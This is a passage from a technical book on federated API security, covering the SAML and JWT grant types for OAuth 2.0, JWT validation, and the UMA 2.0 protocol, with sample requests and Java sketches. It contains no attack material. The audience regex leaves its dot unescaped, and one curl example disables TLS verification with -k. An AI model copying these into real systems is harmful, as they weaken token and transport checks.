The following shows a sample authorization code grant request initiated by the web application at Bar Inc.: GET /authorize?response_type=code &client_id=wiuo879hkjhkjhk3232 &state=xyz &redirect_uri=https://bar.com/cb HTTP/1.1 Host: auth.foo.com This results in the following response, which includes the requested authorization code: HTTP/1.1 302 Found Location: https://bar.com/cb?code=SplwqeZQwqwKJjklje&state=xyz So far it’s the normal OAuth authorization code flow. Now the web application has to talk to the trust broker in its own domain to obtain a SAML assertion. This step is outside the scope of OAuth. Because this is machine-to-machine authentication (from the web application to the trust broker), you can use a SOAP-based WS-Trust protocol to obtain the SAML assertion or any other protocol like OAuth 2.0 Token Delegation profile, which we discussed in Chapter 9. The web application does not need to do this each time a user logs in; it can be one-time operation that is governed by the lifetime of the SAML assertion. The following is a sample SAML assertion obtained from the trust broker: <saml:Assertion > <saml:Issuer>bar.com</saml:Issuer> <ds:Signature> <ds:SignedInfo></ds:SignedInfo> <ds:SignatureValue></ds:SignatureValue> <ds:KeyInfo></ds:KeyInfo> </ds:Signature> <saml:Subject> <saml:NameID>18982198kjk2121</saml:NameID> <saml:SubjectConfirmation> <saml:SubjectConfirmationData NotOnOrAfter="2019-10-05T19:30:14.654Z" Recipient="https://foo.com/oauth2/token"/> Chapter 12 Federating aCCess to apis 263 </saml:SubjectConfirmation> </saml:Subject> <saml:Conditions NotBefore="2019-10-05T19:25:14.654Z" NotOnOrAfter="2019-10-05T19:30:14.654Z"> <saml:AudienceRestriction> <saml:Audience> https://foo.com/oauth2/token </saml:Audience> </saml:AudienceRestriction> </saml:Conditions> <saml:AuthnStatement AuthnInstant="2019-10-05T19:25:14.655Z"> <saml:AuthnContext> <saml:AuthnContextClassRef> urn:oasis:names:tc:SAML:2.0:ac:classes:unspecified </saml:AuthnContextClassRef> </saml:AuthnContext> </saml:AuthnStatement> </saml:Assertion> To use this SAML assertion in an OAuth flow to authenticate the client, it must adhere to the following rules: • The assertion must have a unique identifier for the Issuer element, which identifies the token-issuing entity. In this case, the broker of the Bar Inc. • The assertion must have a NameID element inside the Subject element that uniquely identifies the client application (web app). This is treated as the client ID of the client application at the authorization server. • The SubjectConfirmation method must be set to urn:oasis:names: tc:SAML:2.0:cm:bearer. • If the assertion issuer authenticates the client, then the assertion must have a single AuthnStatement. Chapter 12 Federating aCCess to apis 264 Note Ws-trust is an oasis standard for soap message security. Ws-trust, which is built on top of the Ws-security standard, defines a protocol to exchange identity information that is wrapped in a token (saML), between two trust domains. the blog post at http://blog.facilelogin.com/2010/05/ws-trust-with- fresh-banana-service.html explains Ws-trust at a high level. the latest Ws-trust specification is available at http://docs.oasis-open.org/ws-sx/ ws-trust/v1.4/errata01/ws-trust-1.4-errata01-complete.html. Once the client web application gets the SAML assertion from the trust broker, it has to base64url-encode the assertion and send it to the authorization server along with the access token request. 
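Before looking at the wire-level message, here is a minimal Java sketch of that client-side step: base64url-encoding the SAML assertion and posting it to the token endpoint with the saml2-bearer client assertion type. It uses the Java 11 HttpClient; the endpoint and authorization code values are taken from the surrounding example, and the assertion string is a placeholder for the XML returned by the trust broker.

import java.net.URI;
import java.net.URLEncoder;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;
import java.nio.charset.StandardCharsets;
import java.util.Base64;

public class Saml2BearerClientAuth {

    public static void main(String[] args) throws Exception {
        String samlAssertionXml = "<saml:Assertion>...</saml:Assertion>"; // from the trust broker
        String code = "SplwqeZQwqwKJjklje";                               // authorization code from the earlier step

        // base64url-encode the SAML assertion, without padding.
        String clientAssertion = Base64.getUrlEncoder().withoutPadding()
                .encodeToString(samlAssertionXml.getBytes(StandardCharsets.UTF_8));

        String form = "grant_type=authorization_code"
                + "&code=" + URLEncoder.encode(code, StandardCharsets.UTF_8)
                + "&client_assertion_type=" + URLEncoder.encode(
                        "urn:ietf:params:oauth:client-assertion-type:saml2-bearer",
                        StandardCharsets.UTF_8)
                + "&client_assertion=" + clientAssertion;

        HttpRequest request = HttpRequest.newBuilder()
                .uri(URI.create("https://auth.foo.com/token"))
                .header("Content-Type", "application/x-www-form-urlencoded")
                .POST(HttpRequest.BodyPublishers.ofString(form))
                .build();

        HttpResponse<String> response = HttpClient.newHttpClient()
                .send(request, HttpResponse.BodyHandlers.ofString());
        System.out.println(response.body());
    }
}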
In the following sample HTTP POST message, client_assertion_ type is set to urn:ietf:params:oauth:client-assertion-type:saml2-bearer, and the base64url-encoded (see Appendix E) SAML assertion is set to the client_assertion parameter: POST /token HTTP/1.1 Host: auth.foo.com Content-Type: application/x-www-form-urlencoded grant_type=authorization_code&code=SplwqeZQwqwKJjklje &client_assertion_type=urn:ietf:params:oauth:client-assertion-type:saml2- bearer &client_assertion=HdsjkkbKLew...[omitted for brevity]...OT Once the authorization server receives the access token request, it validates the SAML assertion. If it’s valid (signed by a trusted party), an access token is issued, along with a refresh token. SAML Grant Type for OAuth 2.0 The previous section explained how to use a SAML assertion to authenticate a client application. That is one federation use case that falls under the context of OAuth. There the trust broker was running inside Bar Inc., where the client application was running. Let’s consider a use case where the resource server (API), the authorization server, and the client application run in the same domain (Bar Inc.), while the user is from an outside domain (Foo Inc.). Here the end user authenticates to the web application with a SAML assertion Chapter 12 Federating aCCess to apis 265 (see Figure 12-2). A trust broker (a SAML identity provider) in the user’s domain issues this assertion. The client application uses this assertion to talk to the local authorization server to obtain an access token to access an API on behalf of the logged-in user. Figure 12-2. Brokered authentication with the SAML grant type for OAuth 2.0 Figure 12-2 illustrates how brokered authentication with a SAML grant type for OAuth 2.0 works. • The first three steps are outside the scope of OAuth. The resource owner first logs in to the web application owned by Bar Inc. via SAML 2.0 Web SSO. • The SAML 2.0 Web SSO flow is initiated by the web application by redirecting the user to the SAML identity provider at Foo Inc. (step 2). • Once the user authenticates to the SAML identity provider, the SAML identity provider creates a SAML response (which wraps the assertion) and sends it back to the web application (step 3). The web application validates the signature in the SAML assertion and, if a trusted identity provider signs it, allows the user to log in to the web application. Chapter 12 Federating aCCess to apis 266 • Once the user logs in to the web application, the web application has to exchange the SAML assertion for an access token by talking to its own internal authorization server (steps 4 and 5). The way to do this is defined in the SAML 2.0 Profile for OAuth 2.0 Client Authentication and Authorization Grants specification (RFC 7522). The following is a sample POST message from the web application to the authorization server. There the value of grant_type must be urn:ietf:params:oauth: grant-type:saml2-bearer, and the base64url-encoded SAML assertion is set as the value of the assertion parameter: Note no refresh tokens are issued under the saML Bearer grant type. the lifetime of the access token should not exceed the lifetime of the saML bearer assertion by a significant amount. POST /token HTTP/1.1 Host: auth.bar.com Content-Type: application/x-www-form-urlencoded grant_type=urn:ietf:params:oauth:grant-type:saml2-bearer &assertion=QBNhbWxwOl...[omitted for brevity]...OT4 This request is validated at the authorization server. 
The SAML assertion is once again validated via its signature; and, if a trusted identity provider signs it, the authorization server issues a valid access token. The scope of the access token issued under the SAML Bearer grant type should be set out of band by the resource owner. Out of band here indicates that the resource owner makes a pre-agreement with the resource server/authorization server with respect to the scope associated with a given resource when the SAML grant type is being used. The client application can include a scope parameter in the authorization grant request, but the value of the scope parameter must be a subset of the scope defined out of band by the resource owner. If no scope parameter is included in the authorization grant request, then the access token inherits the scope set out of band. Both federation use cases discussed assume that the resource server and the authorization server are running in the same domain. If that isn’t the case, the resource server must invoke an API exposed by the authorization server to validate the access Chapter 12 Federating aCCess to apis 267 token at the time the client tries to access a resource. If the authorization server supports the OAuth Introspection specification (discussed in Chapter 9), the resource server can talk to the introspection endpoint and find out whether the token is active or not and also what scopes are associated with the token. The resource server can then check whether the token has the required set of scopes to access the resource. JWT Grant Type for OAuth 2.0 The JSON Web Token (JWT) profile for OAuth 2.0, which is defined in the RFC 7523, extends the OAuth 2.0 core specification by defining its own authorization grant type and a client authentication mechanism. An authorization grant in OAuth 2.0 is an abstract representation of the temporary credentials granted to the OAuth 2.0 client by the resource owner to access a resource. The OAuth 2.0 core specification defines four grant types: authorization code, implicit, resource owner password, and client credentials. Each of these grant types defines in a unique way how the resource owner can grant delegated access to a resource he/she owns to an OAuth 2.0 client. The JWT grant type, which we discuss in this chapter, defines how to exchange a JWT for an OAuth 2.0 access token. In addition to the JWT grant type, the RFC 7523 also defines a way to authenticate an OAuth 2.0 client in its interactions with an OAuth 2.0 authorization server. OAuth 2.0 does not define a concrete way for client authentication, even though in most of the cases it’s the HTTP Basic authentication with client id and the client secret. The RFC 7523 defines a way to authenticate an OAuth 2.0 client using a JWT. The JWT authorization grant type assumes that the client is in possession with a JWT. This JWT can be a self-issued JWT or a JWT obtained from an identity provider. Based on who signs the JWT, one can differentiate a self-issued JWT from an identity provider–issued JWT. The client itself signs a self-issued JWT, while an identity provider signs the identity provider–issued JWT. In either case, the OAuth authorization server must trust the issuer of the JWT. The following shows a sample JWT authorization grant request, where the value of the grant_type parameter is set to urn:ietf:params:oauth:grant-type:jwt-bearer. 
POST /token HTTP/1.1 Host: auth.bar.com Content-Type: application/x-www-form-urlencoded Chapter 12 Federating aCCess to apis 268 grant_type=urn%3Aietf%3Aparams%3Aoauth%3Agrant-type%3Ajwt-bearer&assertion= eyJhbGciOiJFUzI1NiIsImtpZCI6IjE2In0. eyJpc3Mi[...omitted for brevity...]. J9l-ZhwP[...omitted for brevity...] The Assertion Framework for OAuth 2.0 Client Authentication and Authorization Grants specification, which is the RFC 7521, defines the parameters in the JWT authorization grant request, as listed out in the following: • grant_type: This is a required parameter, which defines the format of the assertion, as understood by the authorization server. The value of grant_type is an absolute URI, and it must be urn:ietf:params:oauth:grant-type:jwt-bearer. • assertion: This is a required parameter, which carries the token. For example, in the case of JWT authorization grant type, the assertion parameter will carry the base64url-encoded JWT, and it must only contain a single JWT. If there are multiple JWTs in the assertion, then the authorization server will reject the grant request. • scope: This is an optional parameter. Unlike in authorization code and implicit grant types, the JWT grant type does not have a way to get the resource owner’s consent for a requested scope. In such case, the authorization server will establish the resource owner’s consent via an out-of-band mechanism. If the authorization grant request carries a value for the scope parameter, then either it should exactly match the out-of-band established scope or less than that. Note the oauth authorization server will not issue a refresh_token under the JWt grant type. if the access_token expires, then the oauth client has to get a new JWt (if the JWt has expired) or use the same valid JWt to get a new access_token. the lifetime of the access_token should match the lifetime of the corresponding JWt. Chapter 12 Federating aCCess to apis 269 Applications of JWT Grant Type There are multiple applications of the JWT authorization grant type. Let’s have a look at one common use case, where the end user or the resource owner logs in to a web application via OpenID Connect (Chapter 6), then the web application needs to access an API on behalf of the logged-in user, which is secured with OAuth 2.0. Figure 12-3 shows the key interactions related to this use case. Figure 12-3. JWT grant type, a real-world example The following lists out all the interactions as illustrated in Figure 12-3 by the number: • The end user visits the web application (step 1). • In step 2, the user gets redirected to the OpenID Connect server and authenticates against the Active Directory connected to it. After the authentication, the user gets redirected back to the web application, with an authorization code (assuming that we are using OAuth 2.0 authorization code grant type). • The web application talks directly to the OpenID Connect server and exchanges the authorization code from the previous step to an ID token and an access token. The ID token itself is a JWT, which is signed by the OpenID Connect server (step 3). Chapter 12 Federating aCCess to apis 270 • Now the web application needs to invoke an API on behalf of the logged-in user. It talks to the OAuth authorization server, trusted by the API, and using the JWT grant type, exchanges the JWT from step 3 to an OAuth access token. The OAuth authorization server validates the JWT and makes sure that it’s being signed by a trusted identity provider. 
In this case, the OAuth authorization server trusts the OpenID Connect identity provider (step 4). • In step 5, the web application invokes the API with the access token from step 4. • The application server, which hosts the API, validates the access token by talking to the OAuth authorization server, which issued the access token (step 6). JWT Client Authentication The OAuth 2.0 core specification does not define a concrete way to authenticate OAuth clients to the OAuth authorization server. Mostly it’s the HTTP Basic authentication with client_id and the client_secret. The RFC 7523 defines a way to authenticate OAuth clients with a JWT. The JWT client authentication is not just limited to a particular grant type; it can be used with any OAuth grant types. That’s another beauty in OAuth 2.0—the OAuth grant types are decoupled from the client authentication. The following shows a sample request to the OAuth authorization server under the authorization code grant type, which uses JWT client authentication. POST /token HTTP/1.1 Host: auth.bar.com Content-Type: application/x-www-form-urlencoded grant_type=authorization_code& code=n0esc3NRze7LTCu7iYzS6a5acc3f0ogp4& client_assertion_type=urn%3Aietf%3Aparams%3Aoauth%3Aclient-assertion- type%3Ajwt-bearer& client_assertion=eyJhbGciOiJSUzI1NiIsImtpZCI6IjIyIn0. eyJpc3Mi[...omitted for brevity...]. cC4hiUPo[...omitted for brevity...] Chapter 12 Federating aCCess to apis 271 The RFC 7523 uses three additional parameters in the OAuth request to the token endpoint to do the client authentication: client_assertion_type, client_assertion, and client_id (optional). The Assertion Framework for OAuth 2.0 Client Authentication and Authorization Grants specification, which is the RFC 7521, defines these parameters. The following lists them out along with their definitions: • client_assertion_type: This is a required parameter, which defines the format of the assertion, as understood by the OAuth authorization server. The value of client_assertion_type is an absolute URI. For JWT client authentication, this parameter must carry the value urn:ietf:params:oauth:client-assertion- type:jwt-bearer. • client_assertion: This is a required parameter, which carries the token. For example, in the case of JWT client authentication, the client_assertion parameter will carry the base64url-encoded JWT, and it must only contain a single JWT. If there are multiple JWTs in the assertion, then the authorization server will reject the grant request. • client_id: This is an optional parameter. Ideally, the client_id must be present inside the client_assertion itself. If this parameter carries a value, it must match the value of the client_id inside the client_assertion. Having the client_id parameter in the request itself could be useful, as the authorization server does not need to parse the assertion first to identify the client. Applications of JWT Client Authentication The JWT client authentication is used to authenticate a client to an OAuth authorization server with a JWT, instead of using HTTP Basic authentication with client_id and client_secret. Why would someone select JWT client authentication over HTTP Basic authentication? Let’s take an example. Say we have two companies called foo and bar. The foo company hosts a set of APIs, and the bar company has a set of developers who are developing applications against those APIs. 
Like in most of the OAuth examples we discussed in this book, the bar company has to register with the foo company to obtain Chapter 12 Federating aCCess to apis 272 a client_id and client_secret, in order to access its APIs. Since the bar company develops multiple applications (a web app, a mobile app, a rich client app), the same client_id and client_secret obtained from the foo company need to be shared between multiple developers. This is a bit risky as any one of those developers can pass over the secret keys to anyone else—or even misuse them. To fix this, we can use JWT client authentication. Instead of sharing the client_id and the client_secret with its developers, the bar company can create a key pair (a public key and a private key), sign the public key by the key of the company’s certificate authority (CA), and hand them over to its developers. Now, instead of the shared client_id and client_secret, each developer will have its own public key and private key, signed by the company CA. When talking to the foo company’s OAuth authorization server, the applications will use the JWT client authentication, where its own private key signs the JWT—and the token will carry the corresponding public key. The following code snippet shows a sample decoded JWS header and the payload, which matches the preceding criteria. Chapter 7 explains JWS in detail and how it relates to JWT. { "alg": "RS256" "x5c": [ "MIIE3jCCA8agAwIBAgICAwEwDQYJKoZIhvcNAQEFBQ......", "MIIE3jewlJJMddds9AgICAwEwDQYJKoZIhvUjEcNAQ......", ] } { "sub": "3MVG9uudbyLbNPZN8rZTCj6IwpJpGBv49", "aud": "https://login.foo.com", "nbf": 1457330111, "iss": "bar.com", "exp": 1457330711, "iat": 1457330111, "jti": "44688e78-2d30-4e88-8b86-a6e25cd411fd" } The authorization server at the foo company first needs to verify the JWT with the attached public key (which is the value of the x5c parameter in the preceding code snippet) and then needs to check whether the corresponding public key is signed by the Chapter 12 Federating aCCess to apis 273 bar company’s certificate authority. If that is the case, then it’s a valid JWT and would successfully complete the client authentication. Also note that the value of the original client_id created for the bar company is set as the subject of the JWT. Still we have a challenge. How do we revoke a certificate that belongs to a given developer, in case he/she resigns or it is found that the certificate is misused? To facilitate this, the authorization server has to maintain a certificate revocation list (CRL) by the client_id. In other words, each client_id can maintain its own certificate revocation list. To revoke a certificate, the client (in this case, the bar company) has to talk to the CRL API hosted in the authorization server. The CRL API is a custom API that must be hosted at the OAuth authorization server to support this model. This API must be secured with OAuth 2.0 client credentials grant type. Once it receives a request to update the CRL, it will update the CRL corresponding to the client who invokes the API, and each time the client authentication happens, the authorization server must check the public certificate in the JWT against the CRL. If it finds a match, then the request should be turned down immediately. Also, at the time the CRL of a particular client is updated, all the access tokens and refresh tokens issued against a revoked public certificate must be revoked too. 
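To make the preceding checks a bit more concrete, the following is a minimal sketch of what the foo company's authorization server could do with an incoming client_assertion: verify the attached certificate against the bar company's CA, verify the JWT signature with the public key in that certificate, and reject the request if the certificate has been revoked for the corresponding client_id. It assumes the open source Nimbus JOSE+JWT library (nothing discussed here mandates it), and it represents the per-client certificate revocation list simply as a set of certificate thumbprints—how the CRL is actually stored and looked up is an implementation detail.

```java
import com.nimbusds.jwt.SignedJWT;
import com.nimbusds.jose.crypto.RSASSAVerifier;
import com.nimbusds.jose.util.X509CertUtils;
import java.security.MessageDigest;
import java.security.cert.X509Certificate;
import java.security.interfaces.RSAPublicKey;
import java.util.Base64;
import java.util.Set;

public class ClientAssertionVerifier {

    // Verifies a client_assertion as described above and returns the client_id
    // carried in the sub claim of the assertion.
    public String verify(String clientAssertion,
                         X509Certificate barCompanyCa,
                         Set<String> revokedCertThumbprints) throws Exception {

        SignedJWT jwt = SignedJWT.parse(clientAssertion);

        // The first entry of the x5c header carries the developer's public certificate.
        X509Certificate cert = X509CertUtils.parse(
                jwt.getHeader().getX509CertChain().get(0).decode());

        // 1. The certificate must be signed by the bar company's CA and still be valid.
        cert.verify(barCompanyCa.getPublicKey());
        cert.checkValidity();

        // 2. The JWT signature must verify against the public key in the certificate.
        if (!jwt.verify(new RSASSAVerifier((RSAPublicKey) cert.getPublicKey()))) {
            throw new SecurityException("invalid client assertion signature");
        }

        // 3. The certificate must not appear in the CRL maintained for this client_id.
        String thumbprint = Base64.getUrlEncoder().withoutPadding().encodeToString(
                MessageDigest.getInstance("SHA-256").digest(cert.getEncoded()));
        if (revokedCertThumbprints.contains(thumbprint)) {
            throw new SecurityException("certificate revoked for this client");
        }

        // The subject of the assertion carries the original client_id of the bar company.
        return jwt.getJWTClaimsSet().getSubject();
    }
}
```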
In case you worry about the overhead it takes to support a CRL, you probably can use short-lived certificates and forget about revocation. Figure 12-4 shows the interactions between the foo and the bar companies. Figure 12-4. JWT client authentication, a real-world example Chapter 12 Federating aCCess to apis 274 Parsing and Validating JWT The OAuth authorization server must parse and validate the JWT, both in the JWT grant type and in the client authentication. The following lists out the criteria for token validation: • The JWT must have the iss parameter in it. The iss parameter represents the issuer of the JWT. This is treated as a case-sensitive string value. Ideally, this represents the asserting party of the claims set. If Google issues the JWT, then the value of iss would be accounts.google.com. This is an indication to the receiving party who the issuer of the JWT is. • The JWT must have the sub parameter in it. The token issuer or the asserting party issues the JWT for a particular entity, and the claims set embedded into the JWT normally represents this entity, which is identified by the sub parameter. The value of the sub parameter is a case-sensitive string value. For the JWT client authentication, the value of the sub parameter must carry the corresponding client_id, while for the authorization grant, it will be the authorized accessor or the resource server for which the access token is being requested. • The JWT must have the aud parameter. The token issuer issues the JWT to an intended recipient or a list of recipients, which is represented by the aud parameter. The recipient or the recipient list should know how to parse the JWT and validate it. Prior to any validation check, the recipient of the token must first see whether the particular JWT is issued for its use and if not should reject immediately. The value of the aud parameter can be a case- sensitive string value or an array of strings. The token issuer should know, prior to issuing the token, who the intended recipient (or the recipients) of the token is, and the value of the aud parameter must be a pre-agreed value between the token issuer and the recipient. In practice, one can also use a regular expression to validate the audience of the token. For example, the value of the aud in the token can be ∗.apress.com, while each recipient under the apress.com domain can have its own aud values: foo.apress.com, bar.apress.com likewise. Chapter 12 Federating aCCess to apis 275 Instead of finding an exact match for the aud value, each recipient can just check whether the aud value in the token matches a regular expression: (?:[a-zA-Z0-9]∗|\∗).apress.com. This will make sure that any recipient can use a JWT, which is having any subdomain of apress.com. • The JWT must have the exp parameter. Each JWT will carry an expiration time. The recipient of the JWT token must reject it, if that token has expired. The issuer can decide the value of the expiration time. The JWT specification does not recommend or provide any guidelines on how to decide the best token expiration time. It’s a responsibility of the other specifications, which use JWT internally, to provide such recommendations. The value of the exp parameter is calculated by adding the expiration time (from the token issued time) in seconds to the time elapsed from 1970-01-01T00:00:00Z UTC to the current time. If the token issuer’s clock is out of sync with the recipient’s clock (irrespective of their time zone), then the expiration time validation could fail. 
To fix that, each recipient can add a couple of minutes as the clock skew. • The JWT may have the nbf parameter. In other words, this is not a must. The recipient of the token should reject it, if the value of the nbf parameter is greater than the current time. The JWT is not good enough to use prior to the value indicated in the nbf parameter. The value of the nbf parameter is calculated by adding the not before time (from the token issued time) in seconds to the time elapsed from 1970-01-01T00:00:00Z UTC to the current time. • The JWT may have the iat parameter. The iat parameter in the JWT indicates the issued time of the JWT as calculated by the token issuer. The value of the iat parameter is the number of seconds elapsed from 1970-01-01T00:00:00Z UTC to the current time, when the token is issued. • The JWT must be digitally signed or carry a Message Authentication Code (MAC) defined by its issuer. Chapter 12 Federating aCCess to apis 276 Summary • Identity federation is about propagating user identities across boundaries. These boundaries can be between distinct enterprises or even distinct identity management systems within the same enterprise. • Two OAuth 2.0 profiles—SAML 2.0 grant type and JWT grant type— focus on building federation scenarios for API security. • The SAML profile for OAuth 2.0, which is defined in the RFC 7522, extends the capabilities of the OAuth 2.0 core specification. It introduces a new authorization grant type as well as a way of authenticating OAuth 2.0 clients, based on a SAML assertion. • The JSON Web Token (JWT) profile for OAuth 2.0, which is defined in the RFC 7523, extends the capabilities of the OAuth 2.0 core specification. It introduces a new authorization grant type as well as a way of authenticating OAuth 2.0 clients, based on a JWT. Chapter 12 Federating aCCess to apis 277 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_13 CHAPTER 13 User-Managed Access OAuth 2.0 introduced an authorization framework for access delegation. It lets Bob delegate read access to his Facebook wall to a third-party application, without sharing Facebook credentials. User-Managed Access (UMA, pronounced “OOH-mah”) extends this model to another level, where Bob can not only delegate access to a third-party application but also to Peter who uses the same third-party application. UMA is an OAuth 2.0 profile. OAuth 2.0 decouples the resource server from the authorization server. UMA takes one step further: it lets you control a distributed set of resource servers from a centralized authorization server. Also the resource owner can define a set of policies at the authorization server, which can be evaluated at the time a client is granted access to a protected resource. This eliminates the need of having the presence of the resource owner to approve access requests from arbitrary clients or requesting parties. The authorization server can make the decision based on the policies defined by the resource owner. The latest version of UMA, which we discuss in this chapter, is UMA 2.0. If you are interested in learning more about UMA evolution, please check Appendix D: UMA Evolution. Use Cases Let’s say you have multiple bank accounts with Chase Bank, Bank of America, and Wells Fargo. 
You have hired a financial manager called Peter, who manages all your bank accounts through a personal financial management (PFM) application, which helps to budget better and understand the overall financial position, by often pulling information from multiple bank accounts. Here, you need to give limited access to Peter, to use the PFM to access your bank accounts. We assume all the banks expose their functionality over APIs and PFM uses banking APIs to retrieve data. 278 At a very high level, let’s see how UMA solves this problem (see Figure 13-1). First you need to define an access control policy at the authorization server, which all your banks trust. This authorization policy would say Peter should be given read access via the PFM app to Wells Fargo, Chase, and Bank of America bank accounts. Then you also need to introduce each bank to the authorization server, so whenever Peter tries to access your bank accounts, each bank talks to the authorization server and asks whether Peter is allowed to do that. For Peter to access a bank account via PFM app, the PFM app first needs to talk to the authorization server and gets a token on behalf of Peter. During this process, before issuing the token, the authorization server evaluates the access control policy you defined. Let’s take another example. Say you have a Google Doc. You do not want to share this with everyone, but with anyone from the management team of foo and bar companies (see Figure 13-2). Let’s see how this works with UMA. First you have an authorization server, which Google trusts, so whenever someone wants to access your Google Doc, Google talks to the authorization server to see whether that person has the rights to do so. You also define a policy at the authorization server, which says only the managers from foo and bar companies can access your Google Doc. Figure 13-1. An account owner delegates the administration of his/her accounts to a Financial Manager via a Personal Financial Management App Chapter 13 User-Managed aCCess 279 When a person (say Peter) tries to access your Google Doc, Google will redirect you to the authorization server. Then the authorization server will redirect Peter to Foo identity provider (or the home identity provider of Peter). Foo identity provider will authenticate Peter and send back Peter’s role as a claim to the authorization server. Now, since authorization server knows Peter’s role, and also the company Peter belongs to, if Peter belongs to a manager role, it will issue a token to Google Docs app, which it can use to retrieve the corresponding Google Doc via the Google Docs API. UMA 2.0 Roles UMA introduces one more role in addition to the four roles (resource owner, resource server, client, and authorization server) we discussed under OAuth 2.0, in Chapter 4. The following lists out all five roles involved in UMA: 1. Resource owner: In the preceding two use cases, you are the resource owner. In the first case, you owned the bank account, and in the second use case, you owned the Google Doc. 2. Resource server: This is the place which hosts protected resources. In the preceding first use case, each bank is a resource server— and in the second use case, the server, which hosts Google Docs API, is the resource server. Figure 13-2. A Google Doc owner delegates access to a Google Doc to a third party from a different company with specific roles Chapter 13 User-Managed aCCess 280 3. Client: This is the application, which wants to access a resource on behalf of the resource owner. 
In the preceding first use case, the personal financial management (PFM) application is the client, and in the second use case, it is the Google Docs web application. 4. Authorization server: This is the entity, which acts as the security token service (STS) to issue OAuth 2.0 access tokens to client applications. 5. Requesting party: This is something new in UMA. In the preceding first use case, Peter, the financial manager, is the requesting party, and in the second use case, Peter who is a manager at Foo company is the requesting party. The requesting party accesses a resource via a client application, on behalf of the resource owner. UMA Protocol There are two specifications developed under Kantara Initiative, which define UMA protocol. The core specification is called UMA 2.0 Grant for OAuth 2.0 Authorization. The other one is the Federated Authorization for UMA 2.0, which is optional. A grant type is an extension point in OAuth 2.0 architecture. UMA 2.0 grant type extends the OAuth 2.0 to support the requesting party role and defines the flow the client application should follow to obtain an access token on behalf of the requesting party from the authorization server. Let’s see in step by step how UMA 2.0 works, with the first use case we discussed earlier: 1. First, the account owner has to introduce each of his banks to the UMA authorization server. Here we possibly follow OAuth 2.0 authorization code grant type and provision an access token to the Chase Bank. UMA gives a special name to this token: Protection API Access Token (PAT). 2. The Chase Bank uses the provisioned access token or the PAT to register its resources with the authorization server. Following is a sample cURL command for resource registration. $PAT in the following command is a placeholder for the Protection API Access Chapter 13 User-Managed aCCess 281 Token. Here we register the account of the account owner as a resource. \> curl -v -X POST -H "Authorization:Bearer $PAT" -H "Content-Type: application/json" -d '{"resource_ scopes":["view"], "description":"bank account details", "name":"accounts/1112019209", "type":"/accounts"}' https://as.uma.example.com/uma/resourceregistration 3. Peter via the personal financial management (PFM) application tries to access the Chase Bank account with no token. \> curl –X GET https://chase.com/apis/accounts/1112019209 4. Since there is no token in the request from PFM, the bank API responds back with a 401 HTTP error code, along with the endpoint of the authorization server and a permission ticket. This permission ticket represents the level of permissions PFM needs to do a GET to /accounts API of the Chase Bank. In other words, PFM should get an access token from the provided authorization server, with the provided permissions in the given permission ticket. 5. To generate the permission ticket, the Chase Bank has to talk to the authorization server. As per the following cURL command, Chase Bank also passes resource_id and the resource_scope. The permission API is protected via OAuth 2.0, so the Chase Bank has to pass a valid access token to access it. UMA gives a special name to this token: Protection API Access Token (PAT), which we provisioned to Chase Bank in step 1. \> curl -v -X POST -H "Authorization:Bearer $PAT" -H "Content-Type: application/json" -d '[{"resource_id":" accounts/1112019209","resource_scopes":["view"]}]' https://as.uma.example.com/uma/permission {"ticket":"1qw32s-2q1e2s-1rt32g-r4wf2e"} Chapter 13 User-Managed aCCess 282 6. 
Now the Chase Bank will send the following 401 response to the PFM application. HTTP/1.1 401 Unauthorized WWW-Authenticate: UMA realm="chase" as_uri="https://as.uma. example.com" ticket="1qw32s-2q1e2s-1rt32g-r4wf2e " 7. The client application or the PFM now has to talk to the authorization server. By this time, we can assume that Peter, or the requesting party, has already logged in to the client app. If that login happens over OpenID Connect, then PFM has an ID token, which represents Peter. PFM passes both the ID token (as claim_ token) and the permission ticket (as ticket) it got from Chase Bank to the authorization server, in the following cURL command. The claim_token is an optional parameter in the request, and if it is present, then there must be claim_token_format parameter as well, which defines the format of the claim_token. In the following cURL command, use a claim_token of the ID token format, and it can be even a SAML token. Here the $APP_CLIENTID and $APP_CLIENTSECRET are the OAuth 2.0 client id and client secret, respectively, you get at the time you register your application (PFM) with the OAuth 2.0 authorization server. The $IDTOKEN is a placeholder for the OpenID Connect ID token, while $TICKET is a placeholder for the permission ticket. The value of the grant_type parameter must be set to urn:ietf:params:oauth:grant- type:uma-ticket. The following cURL command is only an example, and it does not carry all the optional parameters. \> curl -v -X POST --basic -u $APP_CLIENTID:$APP_ CLIENTSECRET -H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" -k -d "grant_type=urn:ietf:params:oauth:grant-type:uma-ticket& claim_token=$IDTOKEN& Chapter 13 User-Managed aCCess 283 claim_token_format=http://openid.net/specs/openid- connect-core-1_0.html#IDToken& ticket=$TICKET" https://as.uma.example.com/uma/token 8. As the response to the preceding request, the client application gets an access token, which UMA calls a requesting party token (RPT), and before authorization server returns back the access token, it internally evaluates any authorization policies defined by the account owner (or the resource owner) to see whether Peter has access to the corresponding bank account. { "token_type":"bearer", "expires_in":3600, "refresh_token":"22b157546b26c2d6c0165c4ef6b3f736", "access_token":"cac93e1d29e45bf6d84073dbfb460" } 9. Now the application (PFM) tries to access the Chase Bank account with the RPT from the preceding step. \> curl –X GET –H "Authorization: Bearer cac93e1d29e45bf6d84073dbfb460" https://chase.com/apis/ accounts/1112019209 10. The Chase Bank API will now talk to the introspection (see Chapter 9) endpoint to validate the provided RPT and, if the token is valid, will respond back with the corresponding data. If the introspection endpoint is secured, then the Chase Bank API has to pass the PAT in the HTTP authorization header to authenticate. \> curl -H "Authorization:Bearer $PAT" -H 'Content-Type: application/x-www-form-urlencoded' -X POST --data "token= cac93e1d29e45bf6d84073dbfb460" https://as.uma.example.com/ uma/introspection HTTP/1.1 200 OK Content-Type: application/json Cache-Control: no-store Chapter 13 User-Managed aCCess 284 { "active": true, "client_id":"s6BhdRkqt3", "scope": "view", "sub": "peter", "aud": "accounts/1112019209" } 11. Once the Chase Bank finds the token is valid and carries all required scopes, it will respond back to the client application (PFM) with the requested data. 
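The following is a minimal sketch, from the resource server's (Chase Bank's) point of view, of the RPT validation in step 10, written with Java's built-in HTTP client. The introspection endpoint and the PAT are the same placeholders used in the walkthrough; a production implementation would parse the JSON response properly and also check the scope and aud values against the resource being accessed.

```java
import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;

public class UmaResourceGuard {

    private static final String INTROSPECTION_ENDPOINT =
            "https://as.uma.example.com/uma/introspection";

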